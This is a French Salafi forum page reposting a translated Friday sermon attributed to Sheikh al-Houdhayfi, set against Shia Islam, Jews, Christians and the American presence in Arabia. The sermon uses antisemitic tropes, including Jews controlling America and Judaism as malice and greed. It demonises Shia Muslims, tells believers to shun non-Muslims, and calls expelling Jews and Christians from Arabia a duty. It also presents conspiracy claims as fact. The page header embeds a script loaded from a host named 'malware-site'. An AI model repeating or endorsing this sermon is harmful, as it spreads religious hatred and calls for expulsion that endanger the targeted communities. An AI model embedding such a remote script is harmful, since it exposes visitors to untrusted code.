ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Novembre 2017

LunMarMerJeuVenSamDim
  12345
6789101112
13141516171819
20212223242526
27282930   

Calendrier Calendrier


    Khoutbah historique du Cheikh 'Ali Abdur-Rahman al Houdhayfi sur le Chiisme

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    Khoutbah historique du Cheikh 'Ali Abdur-Rahman al Houdhayfi sur le Chiisme

    Message par assalafia le Dim 11 Mai - 21:59

    Surprised 
    Khoutbah historique du Cheikh 'Ali Abdur-Rahman al Houdhayfi, Imam au Masjid-Nabawi, à Madina Al Munawwarah, durant la prière du vendredi du 15 Zul Qa'dah 1418 où était présent un représentant du gouvernement chiite d’Iran.


    Louanges à Allah, Celui qui soutient l'univers tout entier, Seigneur des mondes.

    Il illumine les cœurs de Ses rapproché (Awliya) de la guidance divine et de la force de la foi, et Il a fourni la force à leur perception avec la lumière de la Révélation.

    Quiconque Il désire guider Il le guide sur le droit chemin, Et quiconque Il a voulu, dans sa sagesse, Il l'égare.

    Ainsi les cœurs des koufars et des mounafiqines (mécréants et hypocrites) ont-ils été aveuglés de l'acceptation de la lumière de la vérité, et l'argument tout entier d’Allah a été établi sur toutes ses créatures.

    Je loue mon Seigneur, d'une gratitude qui ne convient qu'à Lui et à Sa Magnifique Souveraineté.

    Je témoigne qu'il n'y a de Divinité qui ne mérite l’adoration qu’Allah, Il est Unique et n'a pas d'associé; et qu'Il est le Maître du Jour de la Résurrection.

    Et je témoigne que notre Prophète et guide Muhammad est Son Serviteur et Messager, imam des premiers et des derniers.

    Il a été envoyé avec le saint Coran en tant que bénédiction pour les musulmans et comme le porteur d'une bonne nouvelle pour eux.

    O Allah!, répand les bénédictions sur Ton serviteur et Messager, Muhammad , sur ses descendants, ses compagnons et ceux qui les ont suivis.

    Amma-Ba`ad (Après cela):

    O musulmans, craignez Allah. Craignez Allah comme il Lui est due.
    Tenez-vous aux forts liens de l'islam.

    O peuple d’Allah! Sans aucun doute la plus grande bénédiction d’Allah sur l'homme est la vraie foi. Par elle Allah apporte la vie aux cœurs morts des koufars, accorde la lumière de l'Imane à l'aveugle égaré.

    Allah dit:

    Est-ce que celui qui était mort et que Nous avons ramené à la vie et à qui Nous avons assigné une lumière grâce avec laquelle il marche parmi les gens, est pareil à celui qui est dans les ténèbres sans pouvoir en sortir? [Sourate Al-'An`âm 6:122]

    Et Il dit plus loin :

    Celui qui sait que ce qui t'est révélé de la part de ton Seigneur est la vérité, est-il semblable à l'aveugle ? Seuls les gens doués d'intelligence réfléchissent bien [Sourate Ar-Ra`d 13:19]

    La religion d’Allah dans les cieux et sur la terre, pour les premiers comme pour les derniers est seulement la religion de l'Islam.

    Les décrets de la Shari`ah ont été différents pour chaque Prophète.

    Chaque Prophète a reçu ses ordres qui étaient appropriés à leur communauté respective.

    Dans Son Savoir Divin et Sa Sagesse, tout ordre qu'Il a jugé approprié, Il l'a annulé, et celui qu'Il a voulu, Il l'a gardé.

    Mais quand il a envoyé le Prince aux hommes, , Il a aboli toutes les Shari'ah précédentes et a demandé à tous les hommes et les djinns de lui obéir.

    Allah dit:

    Dis: ‹O hommes! Je suis pour vous tous le Messager d’Allah, à Qui appartient la royauté des cieux et de la terre. Pas de divinité à part Lui. Il donne la vie et Il donne la mort. Croyez donc en Allah, en Son messager, le Prophète illettré qui croit en Allah et en Ses paroles. Et suivez-le afin que vous soyez bien guidés› [Sourate Al-'A`râf 7:158]

    Et dans un hadith du Prophète alayi salat wa salam : "Par Celui qui tient l'âme de Muhammad entre Ses mains, tout juif ou chrétien qui à partir de cette époque entend mon appel mais qui meurt sans y croire, sera parmi les gens de l'enfer."

    Donc quiconque ne croit pas au Messager d’Allah , brûlera pour toujours dans l'enfer.

    Allah n'accepte aucune autre religion que l'Islam.

    Et quiconque désire une religion autre que l'Islam, ne sera point agrée, et il sera, dans l'au-delà, parmi les perdants [Sourate 'Al-`Imrân 3:85].

    Comme Allah a envoyé Son Prophète avec la meilleure Shari`a, la plus excellente, avec une Religion complète à tous point de vue, qu'Il y inclut tous les principes de base qui avaient été envoyés à tous les Prophètes précédents,

    Il dit donc:

    Il vous a légiféré en matière de religion, ce qu'Il avait enjoint à Noé, ce que Nous t'avons révélé, ainsi que ce que Nous avons enjoint à Abraham, à Moïse et à Jésus: ‹Etablissez la religion; et n'en faites pas un sujet de division›. Ce à quoi tu appelles les associateurs leur parait énorme. Allah élit et rapproche de Lui qui Il veut et guide vers Lui celui qui se repent [Sourate Ach-Choûrâ 42:13]

    Les juifs et les chrétiens savent certainement que la religion de Muhammad est la vraie religion, mais la jalousie envers les musulmans, l'arrogance, l'égoïsme de la richesse et des désirs sont une barrière entre eux et l'Islam. De plus, même avant la venue de Hudhour, les chrétiens et les juifs avaient altérés leur propres Livres divins, et ils avaient complètement changé leur religion. Ainsi ils restent fermement sur leur koufr, égarés du chemin droit.

    Après une brève introduction sur le Haq et le Batil, pour nous musulmans, ce mouvement qui a été lancé afin de rapprocher différentes religions, est une chose très douloureuse. Ce n'est pas dans nos convenances cette invitation lancée par ces 'intellectuels' qui ne sont même pas au courant des doctrines fondamentales et essentielles de l'Islam.

    En particulier en ce moment, alors que des guerres ont lieu au nom de la religion et que tous les avantages y sont liés, de telles décisions et invitations sont encore plus dangereuses pour l'islam et les musulmans.

    Sans aucun doute l'Islam invite les juifs et les chrétiens à se sauver de l'enfer et à entrer au Paradis; à renoncer au Batil (chose vaine, fausse) et à accepter l'Islam.

    Allah dit:

    Dis: ‹O gens du Livre, venez à une parole commune entre nous et vous: que nous n'adorions qu’Allah, sans rien Lui associer, et que nous ne prenions point les uns les autres pour seigneurs en dehors d’Allah›. Puis, s'ils tournent le dos, dites: ‹Soyez témoins que nous, nous sommes soumis› [Sourate 'Al-`Imrân 3:64]

    L'Islam autorise les chrétiens et les juifs à continuer de suivre leur religion mais seulement s'ils se soumettent à l'Islam (la loi d’Allah), payent la Jizyah aux musulmans et restent en paix. L'Islam ne force pas les chrétiens et les juifs à devenir musulmans, comme il est dit dans le saint Coran:

    Nulle contrainte en religion! Car le bon chemin s'est distingué de l’égarement [Sourate Al Baqarah 2:256]

    L'Islam est une tolérance pure et veut le bien pour toute l'humanité. Elle déclare que la religion des juifs et des chrétiens est Baatil et c'est pourquoi quiconque désire embrasser l'Islam il peut le faire et de même pour celui qui désire rester un kafir. Si les juifs, les chrétiens et les Moushrikine (idolâtre) désirent accepter l'Islam, alors l'Islam les acceptera.

    Ils seront comme des frères pour les musulmans car l'islam n'admet aucun préjudice basé sur la race et la couleur. L'Histoire elle-même est témoin de ce fait et Allah déclare:

    Ô hommes! Nous vous avons créés d'un mâle et d'une femelle, et Nous avons fait de vous des nations et des tribus, pour que vous vous entre connaissiez (non pas afin que vous vous méprisiez). Le plus noble d'entre vous, auprès d’Allah, est le plus pieux [Sourate Al-Houjourât 49:13]

    Quant à la question d'un rassemblement entre l'Islam, le christianisme et le judaïsme, cela est tout simplement impossible.

    Allah dit lui-même:

    L'aveugle et celui qui voit ne sont pas semblables. Ni les ténèbres et la lumière. Ni l'ombre et la chaleur ardente. De même, ne sont pas semblables les vivants et les morts. Allah fait entendre qu'Il veut, alors que toi [Muhammad], tu ne peux faire entendre ceux qui sont dans les tombeaux [Sourate Fâtir 35:19-22]

    De la même façon cette fausse notion qui prétend que les musulmans devraient renoncer à certains préceptes islamiques, les ignorer ou se montrer indifférents envers eux, afin de faire pencher vers eux les juifs et les chrétiens; ou bien que les musulmans devraient se lier d'amitié avec eux afin de les rapprocher de l'Islam. Un vrai musulman ne pourra jamais faire cela.

    Allah dit :

    Tu n'en trouveras pas, parmi les gens qui croient en Allah et au Jour dernier, qui prennent pour amis ceux qui s'opposent à Allah et à Son Messager, fussent-ils leurs pères, leur fils, leurs frères ou les gens de leur tribu [Sourate Al-Moujâdala 58:22]

    En bref, il n'y a aucun rapport, aucune relation entre les musulmans et les kouffar. En dépit de cela, l'Islam n'autorise aucun musulman à être cruel envers les kouffar. L'Islam oblige les musulmans à être juste envers eux aussi. D'un autre coté un musulman a reçu l'ordre de défendre sa foi, d'avoir de l'inimitié envers le Baatil (les choses fausses, non islamique), et pas seulement ça, de faire aussi des efforts pour briser sa force.

    La distinction entre l'Islam et le koufr ne peut se faire qu'en s'en tenant aux fondements et aux croyances de l'Islam. En, persévérant dans la foi et en adhérant strictement aux injonctions de l'Islam, les musulmans pourront prospérer dans le monde et par là protéger et sauvegarder leur honneur et leurs droits. Le droit ou le Haq ne peut être établi, le Baatil ne peut être identifié comme du Baatil que par la persévérance dans la religion. La campagne qui a été entamée pour unir différentes religions n'est pas seulement contre l'esprit de l'islam mais mènera les musulmans dans des ennuis et dans le malheur.

    Les résultats désastreux d'un tel mouvement seront l'affaiblissement de l'Imane, l'interpolation des croyances, l'amitié avec les ennemis d’Allah. Allah ordonne aux gens de la foi de n'être amis qu'entre eux.

    Il dit :

    Les croyants et les croyantes sont alliés les uns des autres. Ils commandent le convenable, interdisent le blâmable accomplissent la Salât, acquittent la Zakat et obéissent à Allah et à Son messager. Voilà ceux auxquels Allah fera miséricorde, car Allah est Puissant et Sage [Sourate At-Tawba 9:71]

    Quant aux kouffar ils ne doivent faire partie d'aucun groupe désigné comme amis par Lui :

    Et ceux qui n'ont pas cru sont alliés les uns des autres. Si vous n'agissez pas ainsi [en rompant les liens avec les infidèles], il y aura discorde sur terre et grand désordre [Sourate Al-'Anfâl 8:73].

    Le célèbre Imam Mufassir Ibn-Kathir a interprété ceci de cette façon:

    "Si vous n'adoptez pas la séparation d'avec les kouffar, et que vous vous liés d'amitié avec eux de grands méfaits seront causés au sein du peuple". 'Méfaits' signifie ici l'entremêlement des musulmans avec les kouffar, et de la vérité devenant douteuse. Ainsi un mélange des musulmans avec les koufars mènera à un méfait d'une grande amplitude.

    Allah dit

    O les croyants! Ne prenez pas pour alliés les Juifs et les Chrétiens; ils sont alliés les uns des autres [Sourate Al-Mâ'ida 5:51]

    Comment pourrait-il y avoir des similitudes, des liens entre l'Islam et la Yahudiyya (la foi juive), quand l'Islam est exceptionnelle dans sa pureté, sa lumière, sa brillance, sa noblesse, sa justice, sa tolérance, sa magnanimité, sa haute moralité, aussi bien pour les hommes que pour les jinns alors que la Yahudiyya est un rassemblement de matérialisme, d'étroitesse d'esprit, qu'elle apporte le malice envers l'humanité, qu'elle se dirige vers la dégradation morale, l'avidité et la convoitise.

    Alors comment pourrait-il y avoir un lien entre l'Islam et la Yahudiyya?

    Un musulman peut-il tolérer la calomnie jetée par les juifs sur la pieuse et pure Maryam (Marie) ?

    Les musulmans peuvent-ils supporter la présence des juifs qui disent de `Issa (Jésus fils de Marie) qu'il est le fils d'une prostituée (ou pécheresse)?

    Nous cherchons refuge auprès d’Allah. A Allah ne plaise! Et à ce sujet comment peut-il y avoir un lien entre le Saint Coran et ce Talmoud, le Livre Saint des juifs?

    De même il n'y a aucune similitude entre le christianisme et l'Islam. L'Islam est religion pure et propre, appelant à l'unicité d’Allah, au Tawhid. C'est une justice pure et une bénédiction. C'est une Shari`ah complète, une loi révélée.

    Alors que le christianisme est une déviation du droit chemin. Les chrétiens croient en la trinité père, fils, saint esprit. Le christianisme déclare que le Christ est Dieu et fils de Dieu.

    Et comment pourrait-il y avoir une réconciliation entre les Ahlus Sunnah (Sunnite) et les Shi'ah (Chiite duodécimain) ?

    Les Ahlus Sunnah (Gens de la Sunnah) sont ceux qui ont appris et protégé le Saint Coran, qui ont préservé et protégé la Sounnah du Messager d’Allah, ceux dont Allah S'est servi pour protéger Sa Religion, et ils ont fait le Jihad dans le chemin de l'Islam. L'Histoire témoigne de ceci.

    Alors que les Rafidhah (certaines catégories de chiites, dont fait partie les Imamites actuellement) sont ceux qui maudissent les Compagnons et qui essayent de détruire l'Islam.

    Les Compagnons sont ceux qui nous ont transmis la Religion.

    Si nous devions jeter le doute sur l'intégrité des Compagnons, cela impliquerait la destruction de la Religion.

    Comment peut-il y avoir une réconciliation entre Ahlus Sunnah et les Rafidhah (shi'ahs) alors qu'ils insultent et injurient les trois Califes bien guidés.

    S'ils avaient un peu d'intelligence alors ils réaliseraient que leurs insultes est en fait une insulte au Messager d’Allah.
    Abu Bakr et ‘Umar sont les parents par alliance du Messager d’Allah.

    Ils étaient ses proches confidents durant sa vie et ses voisins proches après son décès.

    Qui peut atteindre cet honneur? Qui peut atteindre cet honneur?

    Ils ont participé au Jihad avec l'envoyé d’Allah dans toutes les campagnes. Ces faits devraient suffire à dissiper les fausses accusations des chiites.

    ‘Othman était le mari de deux des filles du Messager.

    Allah n'a choisi pour son bien aimé que les meilleurs hommes, et les meilleurs compagnons.

    C'était les liens entre le Messager d’Allah et les trois Calife bien guidés.

    Il n'a jamais dit que ces trois-là étaient les ennemis de l'Islam, et il n'a jamais mis en garde contre ces trois-là, comme le prétendent les chiites.

    En fait les insultes contre ces trois-là sont une attaque contre ‘Ali.

    ‘Ali a donné à Abu Bakr la bay'a (le serment d'allégeance) dans la mosquée, c'est-à-dire ouvertement, et il (‘Ali) a marié sa fille Ummou Koulthoom à ‘Umar, il a pris la bay'a (serment d'allégeance) aux mains de ‘Othman, qui était son ministre son ami proche et qu'il aimait.

    ‘Ali aurait-il donné sa fille à un kafir, ou aurait dit donné la bay'a à un kafir?

    Gloire à Allah! ceci est en vérité une grande calomnie.

    Leur calomnie contre Mou'awiyah est en fait une attaque contre Hassan, qui a accepté le khilafat de Mou’awiyah, et que de nombreux Sahabah ont accepté.

    Le Messager l'a loué en de nombreuses occasions.

    Le petit fils du Messager aurait-il accepté le khilafat d'un kafir?

    Gloire à Allah! ceci est en fait une grande calomnie.

    Quand ils disent que ‘Ali et Hassan ont été forcés d'agir ainsi, cela montre leur (aux shi'ahs) manque d'intelligence.

    C'est une insulte envers eux, une des pires insultes.

    Et comment se fait-il qu'ils maudissent La mère des croyant ‘Aïsha, alors qu’Allah déclare dans le Coran qu'elle est bien Oummul Mu'minine (mère des croyants).

    Allah dit en effet: Le Prophète a plus de droit sur les croyants qu'ils n'en ont sur eux- mêmes; et ses épouses sont leurs mères [Sourate Al-'Ahzâb 33:6 ].

    Donc il ne fait aucun doute qu'elle n'est pas une mère pour ceux qui l'insultent (Ils ne sont pas des Croyants).

    Quelqu'un pourrait-il insulter sa propre mère ? Il l'aime plutôt très fort !

    Comment pourrait-il jamais y avoir réconciliation entre les Ahlus Sunnah et les Rafidhah, quand ils croient que Khomeiny, l'imam de la déviance, est blanc de tout péché?

    Ils affirment qu'il est le représentant de leur Mahdi fabriqué.

    Comme ils considèrent leurs imams comme blancs de tout péché, et en absence de principe, le représentant au même statut, ils affirment que Khomeiny est un saint.

    Et une forme de Batil en entraîne une autre.

    Les Ahl Bayt (Gens de la demeure prophétique, sa famille) sont innocents et absous de leurs croyances (aux shi'ahs).

    Les preuves soutenant le mensonge des croyances des shi'ahs sont innombrables.

    Quant à nous, les Ahlus Sunnah, nous ne nous rapprocherons pas d'eux d'un seul cheveu ni de moins que cela.

    Ils sont d'une plus grande nuisance à l'Islam que les Juifs et les Chrétiens.

    Il incombe aux musulmans de rester prudent et sur leurs gardes en ce qui les concerne.

    Allah dit :

    Ils sont vos ennemis, alors méfiez-vous d'eux !. Allah leur déclare la guerre. Où se réfugieront-ils?

    Les Chiites sont les adeptes d'Ibn Saba, le juif, et d'Abu Lu'lu-ah, l'adorateur du feu (majoussi).

    Donc, O musulmans, il est nécessaire pour nous de différencier notre ‘Aqidah, et d'aimer ceux qu’Allah aime, et de détester ceux qu’Allah déteste, pour unir les musulmans, pour n'être qu'une main forte et unie.

    Les ennemis de l'Islam ont unis leurs croyances mensongères pour combattre l'Islam. Ceci s'applique à tous les ennemis anciens ou récents.

    Allah dit : Ni les Juifs, ni les Chrétiens ne seront jamais satisfaits de toi, jusqu'à ce que tu suives leur mila (passion, croyance, religion) [Sourate Al Baqarah 2:120]

    Et Il dit :

    Et ils continueront de vous combattre jusqu'à ce qu'ils vous détournent de votre foi s'ils le peuvent

    Ainsi la seule raison de la création d'un état juif sioniste en Palestine a été de commencer un conflit armé avec les musulmans et de créer des tensions et de la terreur dans la région.

    Après qu'ils aient réussi à créer Israël, la puissance colonialiste juive a alors mis en branle des plans fondamentaux et collectifs qui sont une cause de douleur profonde pour les musulmans même encore de nos jours.

    Entre autre, le plan principal a été la dissolution de toutes les courts Shara`i dans les pays islamiques et d'établir à leur place des lois forgées par les humains.

    A grande échelle, les kouffar ont atteint leur but.

    Mais Louanges à Allah , le gouvernement saoudien n'est pas tombée en proie à cette conspiration.

    De nos jours, parmi tous les gouvernements musulmans du monde, le gouvernement d'Arabie saoudite est le seul modèle représentatif de gouvernement islamique.

    Après avoir réussi à mettre fin à toutes les courts Shara`i dans la plus part des pays musulmans, les juifs et les chrétiens ont lancé un nouveau plan afin de trouver un prétexte à une intervention militaire dans la région.

    Des décisions insidieuses ont été prises et des idées et des croyances antimusulmanes comme l'insurrection, le communisme, le nationalisme ont été instillées dans les esprits des peuples.

    Cela a donné naissance à des tyrans politiques comme Saddam Husayne.

    Un conflit armé ouvert contre la sainte Shari`ah a alors commencé.

    Tous les moyens à leur disposition ont été apportés et les voix de la vérité ont été écrasées.

    Les conspirations des kouffar ont porté leurs fruits et des milliers de familles ont émigré dans les pays occidentaux.

    Les pays victimes de gouvernements militaires se sont de plus en plus affaiblis dans la foi et la religion à causes des influences de l'occident.

    Dans ces pays, tout gouvernement a blâmé le précédent pour la destruction du pays.

    Et la situation à ce jour dans certains pays a décliné au point que faire la Prière en groupe est maintenant considéré comme un crime. La hawla Wala Qouwwata.

    Quand la situation est telle, comment peut-on penser à l'aide divine d’Allah dans l'honneur religieux et la dignité?

    Avec l'établissement d'un état juif, la destruction de toutes les courts Shara`i dans les pays islamiques et leur remplacement par des système législatifs créés par les humains et non islamiques, la circulation et la formulation de groupes et de croyances peu favorable et contraire à l'islam, et en résultat de l'émergence de gens comme Saddam, la décision était maintenant pour les super puissances d'agir selon leurs conspirations.

    Pour paver la voie à une intervention militaire ils ont provoqué une crise.

    Ils contrôlaient déjà les économies de la région.

    Ce n'est maintenant plus un secret que les grandes puissances prévoient la division de l'Arabie en états plus petits constamment en guerre les uns contre les autres.

    Car cela consoliderait les forces du koufr, protègerait leurs croyances et leurs actes anti-islamiques.

    Rappelez-vous que les puissances mondiales sont les ennemis jurés du Royaume d'Arabie, car il est le plus grand centre de l'islam, un fort des musulmans.

    Tous les gouvernements des kouffar essayent de le détruire.

    En fait les forces du koufr se sont maintenant tous unies contre l'Islam et les musulmans.

    Aucun de ces pays n'est plus digne de confiance. En particulier les Américains et les Britanniques qui menacent maintenant ouvertement la survie et la sécurité du royaume.

    Ainsi l'inimitié flagrante, leurs mauvaises intentions, leurs buts destructifs pour l'Arabie saoudite sont maintenant clairs, et tout le monde le sait.

    Amérique! Tu ferais bien de te rappeler que l'Arabie Saoudite n'est pas seule.

    Tous les musulmans du monde, de l'est à l'ouest, sont unis pour défendre la terre sainte, le dernier centre des musulmans.

    Les mauvaises intentions et les buts des puissances mondiales sont :

    - De renforcer et de fortifier l'état sioniste juif d'Israël.

    - De détruire la mosquée d'Al-Aqsa et de construire à sa place une synagogue satisfaisant ainsi un ancien désir des juifs.

    - De maintenir la suprématie militaire des juifs sur les pays arabes et musulmans.

    - De s'approprier une majorité des richesses pétrolières des pays du golfe, ne laissant que les restes aux saoudiens.

    - De donner un coup fatal à l'Islam à la première provocation.

    - De promouvoir tout ce qui est contre l'Islam, qui détruit toutes les vertus morales accordées à l'islam, et qui feront que les états islamiques seront constamment en guerre les uns les autres.

    O Musulmans! Vous devriez tirer une leçon de la Turquie quand le maudit Kamal Ataturk a établi une forme païenne de gouvernement et a soumis par la force les Turcs à un système areligieux et païen.

    Non seulement le système islamique a été écarté mais il s'est opposé sur tous les fronts aux principes islamiques.

    Au point que même de nos jours le gouvernement reste inamical envers les musulmans.

    Il a conclu des pactes militaires avec les juifs.

    En dépit de tous les efforts du gouvernement turc pour s'attirer leurs faveurs, les kouffar ne tolèrent le gouvernement turc que tant qu'il reste soumis et au service des juifs.

    La Turquie a sacrifié toute sa religion, tous ses principes aux chrétiens et aux juifs mais aucun des pays européen ne désire le laisser rejoindre l'Union Européenne.

    Pourquoi ? Quel est le crime commis par la Turquie? Le seul fait qu'elle a un jour été un centre islamique.

    O musulmans! Que la Turquie soit une morale pour vous.

    Soyez bien surs que vous pourrez renoncer à autant de principes islamiques que vous voulez les kouffar ne seront jamais satisfaits de vous.

    Alors au lieu d'essayer d'obtenir leur faveur vous devriez adhérer à votre propre religion.

    Rappelez-vous que cette inimitié des kouffar n'est basée que sur l'Islam.

    S'il n'en était pas ainsi, dites-moi pourquoi le peuple d'Irak a subi des sanctions ses six dernières années?

    Quel est le crime du pauvre peuple irakien si ce n'est d'être musulman ?

    Quant à Saddam et à au parti dirigeant, les sanctions ne les ont pas affecté le moins du monde.

    Les puissances mondiales justifient ses cruelles sanctions contre l'Irak en disant qu'elle viole une résolution des nations unies.

    L'Irak n'en a violé qu'une, mais les ennemis juifs ont violé 60 résolutions des nations Unies.

    Ils n'ont même pas signé le traité de non-prolifération des armes nucléaires, bien que cette région soit un véritable volcan et ne puisse supporter l'accumulation d'armes de destruction massives.

    Saddam Husayne ne peut pas non plus être absout de toute responsabilité.

    Il est également à blâmer pour les atrocités commises contre le peuple d'Irak, car il ne fait que se soumettre aux volontés des ennemis de l'islam. Il ne fait que ce qu'ils veulent qu'il fasse.

    Je préviens l'Amérique de cesser d'interférer dans les affaires de notre région.

    Quant à la sécurité de la religion c'est la responsabilité des états du golfe, en particulier de l'Arabie saoudite elle-même non pas de l'Amérique.

    Amérique, ne soit pas fière de ta puissance!

    C'est une Sunnah d’Allah que partout où les faibles ont été opprimés, les puissants oppresseurs ont été détruits.

    Allah Lui-même cause leur destruction.

    L'Amérique ne doit donc pas être trompée par l'apparent désarroi des musulmans.

    Les Américains doivent tirer leçon des musulmans d'Afghanistan qui avaient commencé le Jihad contre la Russie armés seulement de bâtons.

    Puis ils ont causé la destruction totale de la superpuissance de l'époque.

    Rappelez-vous que la supériorité technologique n'est pas tout. Le vrai pouvoir est celui de la foi, de l'Iman.

    Le maintien de la paix et de la sécurité dans la péninsule arabe appartient au gouvernement arabe lui-même.

    En fait, il est Fardh pour eux de garder leurs frontières. Il n'y a pas besoin d'une intervention étrangère.

    En fait ces puissances étrangères qui sont entrées pour sauver les états du Golf sont-elles mêmes la cause des dangereux problèmes, des anxiétés terribles infligées au peuple.

    Le modus operandi de ces puissances du koufr c'est que partout où il y a une crise, même s'ils l’ont eux-mêmes provoqués, ils sautent sur le prétexte de la résoudre.

    Ils proposent d'aider le pays à sortir de sa crise mais en réalité ils deviennent pour lui un grand danger.

    Car, un loup peut-il garder un troupeau de moutons ?

    O gens! Il y a une inimitié religieuse entre les musulmans et les kouffar.

    Alors comment pourraient-ils être bien intentionnés envers les musulmans?

    Bien que l'Amérique soit un pays chrétien ses rennes sont pourtant entre les mains des juifs.

    L'Amérique n'a aucune puissance.

    Les juifs la manipulent, l'exploitent pour leurs propres buts.

    Les musulmans ne peuvent pas tolérer la présence militaire américaine sur la terre sainte.

    Ils ne le peuvent pas, ils ne supporteront la présence d'aucune puissance du koufr dans la péninsule arabe - le Messager a dit : "Il ne peut coexister deux religions en Arabie."

    Le dernier conseil du Saint Prophète a été : "Expulsez les juifs et les chrétiens des terres arabes."

    Alors maintenant que les juifs et les chrétiens ont installé des bases militaires partout en Arabie saoudite, c'est devenu un devoir pour les musulmans d'agir selon les ordres du Messager d’Allah et de les expulser des terres arabes.

    O musulmans! Un danger imminent vous menace.

    Repentez-vous sincèrement pour votre salut.

    Pour vous sauver de la destruction et de la ruine, repentez-vous, faites Tawbah à Allah pour tous vos péchés.

    A cause des péchés commis par les gens, la ruine et la destruction est sur eux. Et leur délivrance est dans le repentir.

    O vous qui avez bu du vin et ainsi désobéi à Allah , repentez-vous de vos péchés, car ainsi, par votre Tawbah, vous aiderez à la réformation de la société.

    O vous qui avez commis l'adultère ou la sodomie, tournez-vous vers Allah , repentez-vous sincèrement pour votre désobéissance.

    O vous qui avez désobéi à Allah en utilisant des drogues faites Tawbah devant Allah, car en vérité à Lui vous retournerez bientôt.

    O vous qui avez commis la désobéissance en abandonnant la Salat, repentez-vous devant Allah le Puissant.

    O vous qui avec causé une perte pour l'honneur ou le bien de quelqu'un faites Tawbah pour avoir été cruel envers un musulman. Cherchez refuge en Allah .

    Purifiez vos biens de l'intérêt, car à cause de ce mal la destruction et les guerres descendent sur un peuple.

    En matière de business, de vente et d'achat éloignez-vous de ce qui est contraire aux ordres du Saint Coran, de la Shari`ah.

    Car de cette façon toutes les transactions d'une banque seront conformes aux ordres de l'Islam.

    Appelez les gens à Allah.

    Etablissez fermement l'appel à Allah, l'appel à l'Islam.

    Enseignez l'Islam aux gens.

    Prêtez particulièrement attention aux Madaris-e-Islamiyyah installées dans les pays musulmans pour qu'ils fournissent le savoir religieux aux gens.

    Il est obligatoire pour tous les musulmans d'appeler les autres à l'Islam, en particulier pour les ‘Oulamas dont on peut se fier aux croyances, au savoir et à la persévérance; Les ‘Oulamas qui sont bien versés dans la jurisprudence islamique, vers qui les gens se tournent pour trouver des solutions aux problèmes religieux.

    O Musulmans! Evitez ces groupes qui causent la division et la dissension; Evitez les désirs et les tentations qui vous égarent et qui causent la désunion parmi vous.

    O musulmans! Sauvez-vous de la colère et du châtiment d’Allah .

    Allah dit :

    O les croyants, ne prenez pas de confidents en dehors de vous- mêmes: ils ne failliront pas à vous bouleverser. Ils souhaiteraient que vous soyez en difficulté. La haine certes s'est manifestée dans leurs bouches, mais ce que leurs poitrines cachent est encore plus énorme. Voilà que Nous vous exposons les signes. Si vous pouviez raisonner! Vous, (Musulmans) vous les aimez, alors qu'ils ne vous aiment pas; et vous avez foi dans le Livre tout entier. Et lorsqu'ils vous rencontrent, ils disent ‹Nous croyons›; et une fois seuls, de rage contre vous, ils se mordent les bouts des doigts. Dis: ‹mourrez de votre rage›; en vérité, Allah connaît fort bien le contenu des cœurs. Qu'un bien vous touche, ils s'en affligent. Qu'un mal vous atteigne, ils s'en réjouissent. Mais si vous êtes endurants et pieux, leur manigance ne vous causera aucun mal. Allah connaît parfaitement tout ce qu'ils font [Sourate 'Al-`Imrân 3: 118-120]

    Qu’Allah accorde l'abondance dans le Saint Coran pour vous et pour moi.

    Qu'Il rende la récitation du Saint Coran et du Zikr (rappel de Dieu) bénéfique pour vous et pour moi.

    Qu'Il rende profitable pour nous l'obéissance aux instructions et la copie des caractéristiques du Messager d’Allah .

    J'invoque le pardon d’Allah pour moi même, pour vous et pour tous les musulmans, pour tous les péchés que nous avons commis. Louanges à Allah qui est l'ami des pieux.

    Je témoigne qu’Allah seul est digne d'adoration; qu'Il est Unique et qu'Il n'a pas d'associé. C'est Lui qui a honoré les musulmans et a déshonoré les kouffar. Et je témoigne que notre Prophète et chef Muhammad est Son serviteur et Messager; gardien des promesses et des confiances. O Allah ! Que tes meilleures bénédictions et faveurs soient sur Ton Prophète et serviteur, le Messager sur ses descendants et sur les pieux compagnons.

    Amma Ba'd!

    O musulmans! Craignez Allah . Car Il a dit :

    O vous qui croyez! Répondez à Allah et au Messager lorsqu'il vous appelle à ce qui vous donne la (vraie) vie, et sachez qu’Allah s'interpose entre l'homme et son cœur, et que c'est vers Lui que vous serez rassemblés. Et craignez une calamité qui n'affligera pas exclusivement les injustes d'entre vous. Et sachez qu’Allah est dur en punition[Sourate Al-'Anfâl 8:24-25]

    O musulmans! Rassemblez-vous autour du Livre d’Allah et de la Sunnah du Messager . Agissez selon les commandements du Livre d’Allah et selon la Sunnah du Messager .

    Chaque musulman doit se tourner vers Allah .

